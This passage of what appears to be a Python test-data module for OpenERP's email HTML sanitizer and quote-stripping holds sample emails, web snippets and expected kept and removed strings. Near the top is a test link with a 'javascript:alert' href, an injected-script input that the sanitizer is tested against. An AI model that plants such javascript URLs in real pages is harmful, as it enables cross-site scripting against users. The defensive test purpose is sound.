<font color="#1f1f1f" face="monospace" size="2"><a href="http://google.com">google</a></font>
<a href="javascript:alert('malicious code')">test link</a>
"""
EDI_LIKE_HTML_SOURCE = """<div style="font-family: 'Lucica Grande', Ubuntu, Arial, Verdana, sans-serif; font-size: 12px; color: rgb(34, 34, 34); background-color: #FFF; ">
<p>Hello ${object.partner_id.name},</p>
<p>A new invoice is available for you: </p>
<p style="border-left: 1px solid #8e0000; margin-left: 30px;">
<strong>REFERENCES</strong><br />
Invoice number: <strong>${object.number}</strong><br />
Invoice total: <strong>${object.amount_total} ${object.currency_id.name}</strong><br />
Invoice date: ${object.date_invoice}<br />
Order reference: ${object.origin}<br />
Your contact: <a href="mailto:${object.user_id.email or ''}?subject=Invoice%20${object.number}">${object.user_id.name}</a>
</p>
<br/>
<p>It is also possible to directly pay with Paypal:</p>
<a style="margin-left: 120px;" href="${object.paypal_url}">
<img class="oe_edi_paypal_button" src="https://www.paypal.com/en_US/i/btn/btn_paynowCC_LG.gif"/>
</a>
<br/>
<p>If you have any question, do not hesitate to contact us.</p>
<p>Thank you for choosing ${object.company_id.name or 'us'}!</p>
<br/>
<br/>
<div style="width: 375px; margin: 0px; padding: 0px; background-color: #8E0000; border-top-left-radius: 5px 5px; border-top-right-radius: 5px 5px; background-repeat: repeat no-repeat;">
<h3 style="margin: 0px; padding: 2px 14px; font-size: 12px; color: #DDD;">
<strong style="text-transform:uppercase;">${object.company_id.name}</strong></h3>
</div>
<div style="width: 347px; margin: 0px; padding: 5px 14px; line-height: 16px; background-color: #F2F2F2;">
<span style="color: #222; margin-bottom: 5px; display: block; ">
${object.company_id.street}<br/>
${object.company_id.street2}<br/>
${object.company_id.zip} ${object.company_id.city}<br/>
${object.company_id.state_id and ('%s, ' % object.company_id.state_id.name) or ''} ${object.company_id.country_id.name or ''}<br/>
</span>
<div style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; ">
Phone: ${object.company_id.phone}
</div>
<div>
Web : <a href="${object.company_id.website}">${object.company_id.website}</a>
</div>
</div>
</div></body></html>"""
OERP_WEBSITE_HTML_1 = """
<div>
<div class="container">
<div class="row">
<div class="col-md-12 text-center mt16 mb16" data-snippet-id="colmd">
<h2>OpenERP HR Features</h2>
<h3 class="text-muted">Manage your company most important asset: People</h3>
</div>
<div class="col-md-4" data-snippet-id="colmd">
<img class="img-rounded img-responsive" src="/website/static/src/img/china_thumb.jpg">
<h4 class="mt16">Streamline Recruitments</h4>
<p>Post job offers and keep track of each application received. Follow applicants in your recruitment process with the smart kanban view.</p>
<p>Save time by automating some communications with email templates. Resumes are indexed automatically, allowing you to easily find for specific profiles.</p>
</div>
<div class="col-md-4" data-snippet-id="colmd">
<img class="img-rounded img-responsive" src="/website/static/src/img/desert_thumb.jpg">
<h4 class="mt16">Enterprise Social Network</h4>
<p>Break down information silos. Share knowledge and best practices amongst all employees. Follow specific people or documents and join groups of interests to share expertise and documents.</p>
<p>Interact with your collegues in real time with live chat.</p>
</div>
<div class="col-md-4" data-snippet-id="colmd">
<img class="img-rounded img-responsive" src="/website/static/src/img/deers_thumb.jpg">
<h4 class="mt16">Leaves Management</h4>
<p>Keep track of the vacation days accrued by each employee. Employees enter their requests (paid holidays, sick leave, etc), for managers to approve and validate. It's all done in just a few clicks. The agenda of each employee is updated accordingly.</p>
</div>
</div>
</div>
</div>"""
OERP_WEBSITE_HTML_1_IN = [
'Manage your company most important asset: People',
'img class="img-rounded img-responsive" src="/website/static/src/img/china_thumb.jpg"',
]
OERP_WEBSITE_HTML_1_OUT = [
'Break down information silos.',
'Keep track of the vacation days accrued by each employee',
'img class="img-rounded img-responsive" src="/website/static/src/img/deers_thumb.jpg',
]
OERP_WEBSITE_HTML_2 = """
<div class="mt16 cke_widget_editable cke_widget_element oe_editable oe_dirty" data-oe-model="blog.post" data-oe-id="6" data-oe-field="content" data-oe-type="html" data-oe-translate="0" data-oe-expression="blog_post.content" data-cke-widget-data="{}" data-cke-widget-keep-attr="0" data-widget="oeref" contenteditable="true" data-cke-widget-editable="text">
<section class="mt16 mb16" data-snippet-id="text-block">
<div class="container">
<div class="row">
<div class="col-md-12 text-center mt16 mb32" data-snippet-id="colmd">
<h2>
OpenERP Project Management
</h2>
<h3 class="text-muted">Infinitely flexible. Incredibly easy to use.</h3>
</div>
<div class="col-md-12 mb16 mt16" data-snippet-id="colmd">
<p>
OpenERP's <b>collaborative and realtime</b> project
management helps your team get work done. Keep
track of everything, from the big picture to the
minute details, from the customer contract to the
billing.
</p><p>
Organize projects around <b>your own processes</b>. Work
on tasks and issues using the kanban view, schedule
tasks using the gantt chart and control deadlines
in the calendar view. Every project may have its
own stages allowing teams to optimize their job.
</p>
</div>
</div>
</div>
</section>
<section class="" data-snippet-id="image-text">
<div class="container">
<div class="row">
<div class="col-md-6 mt16 mb16" data-snippet-id="colmd">
<img class="img-responsive shadow" src="/website/static/src/img/image_text.jpg">
</div>
<div class="col-md-6 mt32" data-snippet-id="colmd">
<h3>Manage Your Shops</h3>
<p>
OpenERP's Point of Sale introduces a super clean
interface with no installation required that runs
online and offline on modern hardware.
</p><p>
Its full integration with the company inventory
and accounting gives you real time statistics and
consolidations amongst all shops without the hassle
of integrating several applications.
</p>
</div>
</div>
</div>
</section>
<section class="" data-snippet-id="text-image">
<div class="container">
<div class="row">
<div class="col-md-6 mt32" data-snippet-id="colmd">
<h3>Enterprise Social Network</h3>
<p>
Make every employee feel more connected and engaged
with twitter-like features for your own company. Follow
people, share best practices, 'like' top ideas, etc.
</p><p>
Connect with experts, follow what interests you, share
documents and promote best practices with OpenERP
Social application. Get work done with effective
collaboration across departments, geographies
and business applications.
</p>
</div>
<div class="col-md-6 mt16 mb16" data-snippet-id="colmd">
<img class="img-responsive shadow" src="/website/static/src/img/text_image.png">
</div>
</div>
</div>
</section><section class="" data-snippet-id="portfolio">
<div class="container">
<div class="row">
<div class="col-md-12 text-center mt16 mb32" data-snippet-id="colmd">
<h2>Our Portfolio</h2>
<h4 class="text-muted">More than 500 successful projects</h4>
</div>
<div class="col-md-4" data-snippet-id="colmd">
<img class="img-thumbnail img-responsive" src="/website/static/src/img/deers.jpg">
<img class="img-thumbnail img-responsive" src="/website/static/src/img/desert.jpg">
<img class="img-thumbnail img-responsive" src="/website/static/src/img/china.jpg">
</div>
<div class="col-md-4" data-snippet-id="colmd">
<img class="img-thumbnail img-responsive" src="/website/static/src/img/desert.jpg">
<img class="img-thumbnail img-responsive" src="/website/static/src/img/china.jpg">
<img class="img-thumbnail img-responsive" src="/website/static/src/img/deers.jpg">
</div>
<div class="col-md-4" data-snippet-id="colmd">
<img class="img-thumbnail img-responsive" src="/website/static/src/img/landscape.jpg">
<img class="img-thumbnail img-responsive" src="/website/static/src/img/china.jpg">
<img class="img-thumbnail img-responsive" src="/website/static/src/img/desert.jpg">
</div>
</div>
</div>
</section>
</div>
"""
OERP_WEBSITE_HTML_2_IN = [
'management helps your team get work done',
]
OERP_WEBSITE_HTML_2_OUT = [
'Make every employee feel more connected',
'img class="img-responsive shadow" src="/website/static/src/img/text_image.png',
]
TEXT_1 = """I contact you about our meeting tomorrow. Here is the schedule I propose:
9 AM: brainstorming about our new amazing business app
9.45 AM: summary
10 AM: meeting with Ignasse to present our app
Is everything ok for you ?
--
MySignature"""
TEXT_1_IN = ["""I contact you about our meeting tomorrow. Here is the schedule I propose:
9 AM: brainstorming about our new amazing business app
9.45 AM: summary
10 AM: meeting with Ignasse to present our app
Is everything ok for you ?"""]
TEXT_1_OUT = ["""--
MySignature"""]
TEXT_2 = """Salut Raoul!
Le 28 oct. 2012 à 00:02, Raoul Grosbedon a écrit :
> I contact you about our meeting tomorrow. Here is the schedule I propose: (quote)
Of course. This seems viable.
> 2012/10/27 Bert Tartopoils :
>> blahblahblah (quote)?
>>
>> blahblahblah (quote)
>>
>> Bert TARTOPOILS
>> bert.tartopoils@miam.miam
>>
>
>
> --
> RaoulSignature
Bert TARTOPOILS
bert.tartopoils@miam.miam
"""
TEXT_2_IN = ["Salut Raoul!", "Of course. This seems viable."]
TEXT_2_OUT = ["I contact you about our meeting tomorrow. Here is the schedule I propose: (quote)",
"""> 2012/10/27 Bert Tartopoils :
>> blahblahblah (quote)?
>>
>> blahblahblah (quote)
>>
>> Bert TARTOPOILS
>> bert.tartopoils@miam.miam
>>
>
>
> --
> RaoulSignature"""]
HTML_1 = """<p>I contact you about our meeting for tomorrow. Here is the schedule I propose: (keep)
9 AM: brainstorming about our new amazing business app
9.45 AM: summary
10 AM: meeting with Ignasse to present our app
Is everything ok for you ?
--
MySignature</p>"""
HTML_1_IN = ["""I contact you about our meeting for tomorrow. Here is the schedule I propose: (keep)
9 AM: brainstorming about our new amazing business app
9.45 AM: summary
10 AM: meeting with Ignasse to present our app
Is everything ok for you ?"""]
HTML_1_OUT = ["""--
MySignature"""]
HTML_2 = """<div>
<font><span>I contact you about our meeting for tomorrow. Here is the schedule I propose:</span></font>
</div>
<div>
<ul>
<li><span>9 AM: brainstorming about our new amazing business app</span></li>
<li><span>9.45 AM: summary</span></li>
<li><span>10 AM: meeting with Fabien to present our app</span></li>
</ul>
</div>
<div>
<font><span>Is everything ok for you ?</span></font>
</div>"""
HTML_2_IN = ["<font><span>I contact you about our meeting for tomorrow. Here is the schedule I propose:</span></font>",
"<li><span>9 AM: brainstorming about our new amazing business app</span></li>",
"<li><span>9.45 AM: summary</span></li>",
"<li><span>10 AM: meeting with Fabien to present our app</span></li>",
"<font><span>Is everything ok for you ?</span></font>"]
HTML_2_OUT = []
HTML_3 = """<div><pre>This is an answer.
Regards,
XXXXXX
----- Mail original -----</pre>
<pre>Hi,
My CRM-related question.
Regards,
XXXX</pre></div>"""
HTML_3_IN = ["""<div><pre>This is an answer.
Regards,
XXXXXX
----- Mail original -----</pre>"""]
HTML_3_OUT = ["Hi,", "My CRM-related question.",
"Regards,"]
HTML_4 = """
<div>
<div>Hi Nicholas,</div>
<br>
<div>I'm free now. 00447710085916.</div>
<br>
<div>Regards,</div>
<div>Nicholas</div>
<br>
<span id="OLK_SRC_BODY_SECTION">
<div style="font-family:Calibri; font-size:11pt; text-align:left; color:black; BORDER-BOTTOM: medium none; BORDER-LEFT: medium none; PADDING-BOTTOM: 0in; PADDING-LEFT: 0in; PADDING-RIGHT: 0in; BORDER-TOP: #b5c4df 1pt solid; BORDER-RIGHT: medium none; PADDING-TOP: 3pt">
<span style="font-weight:bold">From: </span>OpenERP Enterprise <<a href="mailto:sales@openerp.com">sales@openerp.com</a>><br><span style="font-weight:bold">Reply-To: </span><<a href="mailto:sales@openerp.com">sales@openerp.com</a>><br><span style="font-weight:bold">Date: </span>Wed, 17 Apr 2013 13:30:47 +0000<br><span style="font-weight:bold">To: </span>Microsoft Office User <<a href="mailto:n.saxlund@babydino.com">n.saxlund@babydino.com</a>><br><span style="font-weight:bold">Subject: </span>Re: your OpenERP.com registration<br>
</div>
<br>
<div>
<p>Hello Nicholas Saxlund, </p>
<p>I noticed you recently registered to our OpenERP Online solution. </p>
<p>You indicated that you wish to use OpenERP in your own company. We would like to know more about your business needs and requirements, and see how we can help you. When would you be available to discuss your project ?
</p>
<p>Best regards, </p>
<pre><a href="http://openerp.com">http://openerp.com</a>
Belgium: +32.81.81.37.00
U.S.: +1 (650) 307-6736
India: +91 (79) 40 500 100
</pre>
</div>
</span>
</div>"""
HTML_5 = """<div><pre>Hi,
I have downloaded OpenERP installer 7.0 and successfully installed the postgresql server and the OpenERP.
I created a database and started to install module by log in as administrator.
However, I was not able to install any module due to "OpenERP Server Error" as shown in the attachement.
Could you please let me know how could I fix this problem?
Regards,
Goh Sin Yih
________________________________
From: OpenERP Enterprise <sales@openerp.com>
To: sinyih_goh@yahoo.com
Sent: Friday, February 8, 2013 12:46 AM
Subject: Feedback From Your OpenERP Trial
Hello Goh Sin Yih,
Thank you for having tested OpenERP Online.
I noticed you started a trial of OpenERP Online (gsy) but you did not decide to keep using it.
So, I just wanted to get in touch with you to get your feedback. Can you tell me what kind of application you were looking for and why you didn't decide to continue with OpenERP?
Thanks in advance for providing your feedback,
Do not hesitate to contact me if you have any questions,
Thanks,
</pre>"""
GMAIL_1 = """Hello,<div><br></div><div>Ok for me. I am replying directly in gmail, without signature.</div><div><br></div><div>Kind regards,</div><div><br></div><div>Demo.<br><br><div>On Thu, Nov 8, 2012 at 5:29 PM, <span><<a href="mailto:dummy@example.com">dummy@example.com</a>></span> wrote:<br><blockquote><div>I contact you about our meeting for tomorrow. Here is the schedule I propose:</div><div><ul><li>9 AM: brainstorming about our new amazing business app</span></li></li>
<li>9.45 AM: summary</li><li>10 AM: meeting with Fabien to present our app</li></ul></div><div>Is everything ok for you ?</div>
<div><p>--<br>Administrator</p></div>
<div><p>Log in our portal at: <a href="http://localhost:8069#action=login&db=mail_1&login=demo">http://localhost:8069#action=login&db=mail_1&login=demo</a></p></div>
</blockquote></div><br></div>"""
GMAIL_1_IN = ['Ok for me. I am replying directly in gmail, without signature.']
GMAIL_1_OUT = ['Administrator', 'Log in our portal at:']
THUNDERBIRD_1 = """<div>On 11/08/2012 05:29 PM,
<a href="mailto:dummy@example.com">dummy@example.com</a> wrote:<br></div>
<blockquote>
<div>I contact you about our meeting for tomorrow. Here is the
schedule I propose:</div>
<div>
<ul><li>9 AM: brainstorming about our new amazing business
app</span></li></li>
<li>9.45 AM: summary</li>
<li>10 AM: meeting with Fabien to present our app</li>
</ul></div>
<div>Is everything ok for you ?</div>
<div>
<p>--<br>
Administrator</p>
</div>
<div>
<p>Log in our portal at:
<a href="http://localhost:8069#action=login&db=mail_1&token=rHdWcUART5PhEnJRaXjH">http://localhost:8069#action=login&db=mail_1&token=rHdWcUART5PhEnJRaXjH</a></p>
</div>
</blockquote>
Ok for me. I am replying directly below your mail, using Thunderbird, with a signature.<br><br>
Did you receive my email about my new laptop, by the way ?<br><br>
Raoul.<br><pre>--
Raoul Grosbedonnée
</pre>"""
THUNDERBIRD_1_IN = ['Ok for me. I am replying directly below your mail, using Thunderbird, with a signature.']
THUNDERBIRD_1_OUT = ['I contact you about our meeting for tomorrow.', 'Raoul Grosbedon']
HOTMAIL_1 = """<div>
<div dir="ltr"><br>
I have an amazing company, i'm learning OpenERP, it is a small company yet, but plannig to grow up quickly.
<br> <br>Kindest regards,<br>xxx<br>
<div>
<div id="SkyDrivePlaceholder">
</div>
<hr id="stopSpelling">
Subject: Re: your OpenERP.com registration<br>From: xxx@xxx.xxx<br>To: xxx@xxx.xxx<br>Date: Wed, 27 Mar 2013 17:12:12 +0000
<br><br>
Hello xxx,
<br>
I noticed you recently created an OpenERP.com account to access OpenERP Apps.
<br>
You indicated that you wish to use OpenERP in your own company.
We would like to know more about your business needs and requirements, and see how
we can help you. When would you be available to discuss your project ?<br>
Best regards,<br>
<pre>
<a href="http://openerp.com" target="_blank">http://openerp.com</a>
Belgium: +32.81.81.37.00
U.S.: +1 (650) 307-6736
India: +91 (79) 40 500 100
</pre>
</div>
</div>
</div>"""
HOTMAIL_1_IN = ["I have an amazing company, i'm learning OpenERP, it is a small company yet, but plannig to grow up quickly."]
HOTMAIL_1_OUT = ["Subject: Re: your OpenERP.com registration", " I noticed you recently created an OpenERP.com account to access OpenERP Apps.",
"We would like to know more about your business needs and requirements", "Belgium: +32.81.81.37.00"]
MSOFFICE_1 = """
<div>
<div class="WordSection1">
<p class="MsoNormal">
<span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D">
Our requirements are simple. Just looking to replace some spreadsheets for tracking quotes and possibly using the timecard module.
We are a company of 25 engineers providing product design services to clients.
</span>
</p>
<p></p>
<p></p>
<p class="MsoNormal">
<span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D">
I’ll install on a windows server and run a very limited trial to see how it works.
If we adopt OpenERP we will probably move to Linux or look for a hosted SaaS option.
</span>
</p>
<p></p>
<p></p>
<p class="MsoNormal">
<span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D">
<br>
I am also evaluating Adempiere and maybe others.
</span>
</p>
<p></p>
<p></p>
<p class="MsoNormal">
<span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D">
</span>
</p>
<p> </p>
<p></p>
<p class="MsoNormal">
<span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D">
I expect the trial will take 2-3 months as this is not a high priority for us.
</span>
</p>
<p></p>
<p></p>
<p class="MsoNormal">
<span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D">
</span>
</p>
<p> </p>
<p></p>
<p class="MsoNormal">
<span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D">
Alan
</span>
</p>
<p></p>
<p></p>
<p class="MsoNormal">
<span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D">
</span>
</p>
<p> </p>
<p></p>
<div>
<div style="border:none;border-top:solid #B5C4DF 1.0pt;padding:3.0pt 0in 0in 0in">
<p class="MsoNormal">
<b><span style="font-size:10.0pt;font-family:"Tahoma","sans-serif"">
From:
</span></b>
<span style="font-size:10.0pt;font-family:"Tahoma","sans-serif"">
OpenERP Enterprise [mailto:sales@openerp.com]
<br><b>Sent:</b> Monday, 11 March, 2013 14:47<br><b>To:</b> Alan Widmer<br><b>Subject:</b> Re: your OpenERP.com registration
</span>
</p>
<p></p>
<p></p>
</div>
</div>
<p class="MsoNormal"></p>
<p> </p>
<p>Hello Alan Widmer, </p>
<p></p>
<p>I noticed you recently downloaded OpenERP. </p>
<p></p>
<p>
You mentioned you wish to use OpenERP in your own company. Please let me know more about your
business needs and requirements. When will you be available to discuss your project?
</p>
<p></p>
<p>Thanks for your interest in OpenERP, </p>
<p></p>
<p>Feel free to contact me if you have any questions, </p>
<p></p>
<p>Looking forward to hearing from you soon. </p>
<p></p>
<pre><p> </p></pre>
<pre>--<p></p></pre>
<pre>Nicolas<p></p></pre>
<pre><a href="http://openerp.com">http://openerp.com</a><p></p></pre>
<pre>Belgium: +32.81.81.37.00<p></p></pre>
<pre>U.S.: +1 (650) 307-6736<p></p></pre>
<pre>India: +91 (79) 40 500 100<p></p></pre>
<pre> <p></p></pre>
</div>
</div>"""
MSOFFICE_1_IN = ['Our requirements are simple. Just looking to replace some spreadsheets for tracking quotes and possibly using the timecard module.']
MSOFFICE_1_OUT = ['I noticed you recently downloaded OpenERP.', 'You mentioned you wish to use OpenERP in your own company.', 'Belgium: +32.81.81.37.00']
MSOFFICE_2 = """
<div>
<div class="WordSection1">
<p class="MsoNormal">
<span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D">Nicolas,</span></p><p></p>
<p></p>
<p class="MsoNormal" style="text-indent:.5in">
<span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D">We are currently investigating the possibility of moving away from our current ERP </span></p><p></p>
<p></p>
<p class="MsoNormal">
<span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D">
</span></p><p> </p>
<p></p>
<p class="MsoNormal">
<span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D">Thank You</span></p><p></p>
<p></p>
<p class="MsoNormal">
<span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D">Matt</span></p><p></p>
<p></p>
<p class="MsoNormal">
<span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D">
</span></p><p> </p>
<p></p>
<div>
<p class="MsoNormal">
<span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D">Raoul Petitpoil</span></p><p></p>
<p></p>
<p class="MsoNormal">
<span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D">Poil Industries</span></p><p></p>
<p></p>
<p class="MsoNormal">
<span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D">Information Technology</span></p><p></p>
<p></p>
<p class="MsoNormal">
<span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D">920 Super Street</span></p><p></p>
<p></p>
<p class="MsoNormal">
<span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D">Sanchez, Pa 17046 USA</span></p><p></p>
<p></p>
<p class="MsoNormal">
<span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D">Tel: xxx.xxx</span></p><p></p>
<p></p>
<p class="MsoNormal">
<span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D">Fax: xxx.xxx</span></p><p></p>
<p></p>
<p class="MsoNormal">
<span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D">Email: </span>
<a href="mailto:raoul@petitpoil.com">
<span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:blue">raoul@petitpoil.com</span>
</a>
<span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D">
</span></p><p></p>
<p></p>
<p class="MsoNormal">
<span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D">www.poilindustries.com</span></p><p></p>
<p></p>
<p class="MsoNormal">
<span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D">www.superproducts.com</span></p><p></p>
<p></p>
</div>
<p class="MsoNormal">
<span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D">
</span></p><p> </p>
<p></p>
<div>
<div style="border:none;border-top:solid #B5C4DF 1.0pt;padding:3.0pt 0in 0in 0in">
<p class="MsoNormal">
<b>
<span style="font-size:10.0pt;font-family:"Tahoma","sans-serif"">From:</span>
</b>
<span style="font-size:10.0pt;font-family:"Tahoma","sans-serif""> OpenERP Enterprise [mailto:sales@openerp.com] <br><b>Sent:</b> Wednesday, April 17, 2013 1:31 PM<br><b>To:</b> Matt Witters<br><b>Subject:</b> Re: your OpenERP.com registration</span></p><p></p>
<p></p>
</div>
</div>
<p class="MsoNormal"></p>
<p> </p>
<p>Hello Raoul Petitpoil, </p>
<p></p>
<p>I noticed you recently downloaded OpenERP. </p>
<p></p>
<p>You indicated that you wish to use OpenERP in your own company. We would like to know more about your business needs and requirements, and see how we can help you. When would you be available to discuss your project ? </p>
<p></p>
<p>Best regards, </p>
<p></p>
<pre> <p> </p>
</pre>
<pre>--<p></p></pre>
<pre>Nicolas<p></p></pre>
<pre> <a href="http://openerp.com">http://openerp.com</a>
<p></p>
</pre>
<pre>Belgium: +32.81.81.37.00<p></p></pre>
<pre>U.S.: +1 (650) 307-6736<p></p></pre>
<pre>India: +91 (79) 40 500 100<p></p></pre>
<pre> <p></p></pre>
</div>
</div>"""
MSOFFICE_2_IN = ['We are currently investigating the possibility']
MSOFFICE_2_OUT = ['I noticed you recently downloaded OpenERP.', 'You indicated that you wish', 'Belgium: +32.81.81.37.00']
MSOFFICE_3 = """<div>
<div class="WordSection1">
<p class="MsoNormal">
<span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D">Hi Nicolas !</span></p><p></p>
<p></p>
<p class="MsoNormal">
<span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D">
</span></p><p> </p>
<p></p>
<p class="MsoNormal">
<span lang="EN-US" style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D">Yes I’d be glad to hear about your offers as we struggle every year with the planning/approving of LOA. </span></p><p></p>
<p></p>
<p class="MsoNormal">
<span lang="EN-US" style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D">I saw your boss yesterday on tv and immediately wanted to test the interface. </span></p><p></p>
<p></p>
<p class="MsoNormal">
<span lang="EN-US" style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D">
</span></p><p> </p>
<p></p>
<div>
<p class="MsoNormal">
<b>
<span lang="NL-BE" style="font-size:10.0pt;font-family:"Trebuchet MS","sans-serif";color:gray">Bien à vous, </span></b></p><p></p><b>
</b>
<p></p>
<p class="MsoNormal">
<b>
<span lang="NL-BE" style="font-size:10.0pt;font-family:"Trebuchet MS","sans-serif";color:gray">Met vriendelijke groeten, </span></b></p><p></p><b>
</b>
<p></p>
<p class="MsoNormal">
<b>
<span lang="EN-GB" style="font-size:10.0pt;font-family:"Trebuchet MS","sans-serif";color:gray">Best regards,</span></b></p><p></p><b>
</b>
<p></p>
<p class="MsoNormal">
<b>
<span lang="EN-GB" style="font-size:10.0pt;font-family:"Trebuchet MS","sans-serif";color:gray">
</span></b></p><p><b> </b></p><b>
</b>
<p></p>
<p class="MsoNormal">
<b>
<span lang="EN-GB" style="font-size:10.0pt;font-family:"Trebuchet MS","sans-serif";color:gray">R. Petitpoil <br></span>
</b>
<span lang="EN-GB" style="font-size:10.0pt;font-family:"Trebuchet MS","sans-serif";color:gray">Human Resource Manager<b><br><br>Field Resource s.a n.v. <i> <br></i></b>Hermesstraat 6A <br>1930 Zaventem</span>
<span lang="EN-GB" style="font-size:8.0pt;font-family:"Tahoma","sans-serif";color:gray"><br></span>
<b>
<span lang="FR" style="font-size:10.0pt;font-family:Wingdings;color:#1F497D">(</span>
</b>
<b>
<span lang="FR" style="font-size:9.0pt;font-family:Wingdings;color:#1F497D"> </span>
</b>
<b>
<span lang="EN-GB" style="font-size:8.0pt;font-family:"Trebuchet MS","sans-serif";color:gray">xxx.xxx </span>
</b>
<b>
<span lang="EN-GB" style="font-size:9.0pt;font-family:"Trebuchet MS","sans-serif";color:gray"><br></span>
</b>
<b>
<span lang="FR" style="font-size:10.0pt;font-family:"Wingdings 2";color:#1F497D">7</span>
</b>
<b>
<span lang="FR" style="font-size:9.0pt;font-family:"Wingdings 2";color:#1F497D"> </span>
</b>
<b>
<span lang="EN-GB" style="font-size:8.0pt;font-family:"Trebuchet MS","sans-serif";color:gray">+32 2 727.05.91<br></span>
</b>
<span lang="EN-GB" style="font-size:24.0pt;font-family:Webdings;color:green">P</span>
<span lang="EN-GB" style="font-size:8.0pt;font-family:"Tahoma","sans-serif";color:green"> <b> </b></span>
<b>
<span lang="EN-GB" style="font-size:9.0pt;font-family:"Trebuchet MS","sans-serif";color:green">Please consider the environment before printing this email.</span>
</b>
<span lang="EN-GB" style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:navy"> </span>
<span lang="EN-GB" style="font-family:"Calibri","sans-serif";color:navy">
</span></p><p></p>
<p></p>
</div>
<p class="MsoNormal">
<span lang="EN-US" style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D">
</span></p><p> </p>
<p></p>
<div>
<div style="border:none;border-top:solid #B5C4DF 1.0pt;padding:3.0pt 0cm 0cm 0cm">
<p class="MsoNormal">
<b>
<span lang="FR" style="font-size:10.0pt;font-family:"Tahoma","sans-serif"">De :</span>
</b>
<span lang="FR" style="font-size:10.0pt;font-family:"Tahoma","sans-serif""> OpenERP Enterprise [mailto:sales@openerp.com] <br><b>Envoyé :</b> jeudi 18 avril 2013 11:31<br><b>À :</b> Paul Richard<br><b>Objet :</b> Re: your OpenERP.com registration</span></p><p></p>
<p></p>
</div>
</div>
<p class="MsoNormal"></p>
<p> </p>
<p>Hello Raoul PETITPOIL, </p>
<p></p>
<p>I noticed you recently registered to our OpenERP Online solution. </p>
<p></p>
<p>You indicated that you wish to use OpenERP in your own company. We would like to know more about your business needs and requirements, and see how we can help you. When would you be available to discuss your project ? </p>
<p></p>
<p>Best regards, </p>
<p></p>
<pre> <p> </p>
</pre>
<pre>--<p></p></pre>
<pre>Nicolas<p></p></pre>
<pre> <a href="http://openerp.com">http://openerp.com</a>
<p></p>
</pre>
<pre>Belgium: +32.81.81.37.00<p></p></pre>
<pre>U.S.: +1 (650) 307-6736<p></p></pre>
<pre>India: +91 (79) 40 500 100<p></p></pre>
<pre> <p></p></pre>
</div>
</div>"""
MSOFFICE_3_IN = ['I saw your boss yesterday']
MSOFFICE_3_OUT = ['I noticed you recently registered to our OpenERP Online solution.', 'You indicated that you wish', 'Belgium: +32.81.81.37.00']
# ------------------------------------------------------------
# Test cases coming from bugs
# ------------------------------------------------------------
# bug: read more not apparent, strange message in read more span
BUG1 = """<pre>Hi Migration Team,
Paragraph 1, blah blah blah blah blah blah blah blah blah blah blah blah
blah blah blah blah blah blah blah blah blah blah blah blah blah blah
blah blah blah blah blah blah blah blah blah blah blah blah blah blah
blah blah blah blah blah blah blah blah blah blah blah blah blah blah
blah blah blah blah blah blah blah blah blah blah blah blah blah blah
blah blah blah blah blah blah blah blah blah blah blah blah blah blah
blah blah blah blah blah blah blah blah.
Paragraph 2, blah blah blah blah blah blah blah blah blah blah blah blah
blah blah blah blah blah blah blah blah blah blah blah blah blah blah
blah blah blah blah blah blah blah blah blah blah blah blah blah blah
blah blah blah blah blah blah blah blah blah blah blah blah blah blah
blah blah blah blah blah blah blah blah blah blah blah blah blah blah
blah blah blah blah blah blah blah blah blah blah blah blah blah blah
blah blah blah blah blah blah blah blah.
Paragraph 3, blah blah blah blah blah blah blah blah blah blah blah blah
blah blah blah blah blah blah blah blah blah blah blah blah blah blah
blah blah blah blah blah blah blah blah blah blah blah blah blah blah
blah blah blah blah blah blah blah blah blah blah blah blah blah blah
blah blah blah blah blah blah blah blah blah blah blah blah blah blah
blah blah blah blah blah blah blah blah blah blah blah blah blah blah
blah blah blah blah blah blah blah blah.
Thanks.
Regards,
--
Olivier Laurent
Migration Manager
OpenERP SA
Chaussée de Namur, 40
B-1367 Gérompont
Tel: +32.81.81.37.00
Web: http://www.openerp.com</pre>"""
BUG_1_IN = [
'Hi Migration Team',
'Paragraph 1'
]
BUG_1_OUT = [
'Olivier Laurent',
'Chaussée de Namur',
'81.81.37.00',
'openerp.com',
]
BUG2 = """
<div>
<br>
<div class="moz-forward-container"><br>
<br>
-------- Original Message --------
<table class="moz-email-headers-table" border="0" cellpadding="0" cellspacing="0">
<tbody>
<tr>
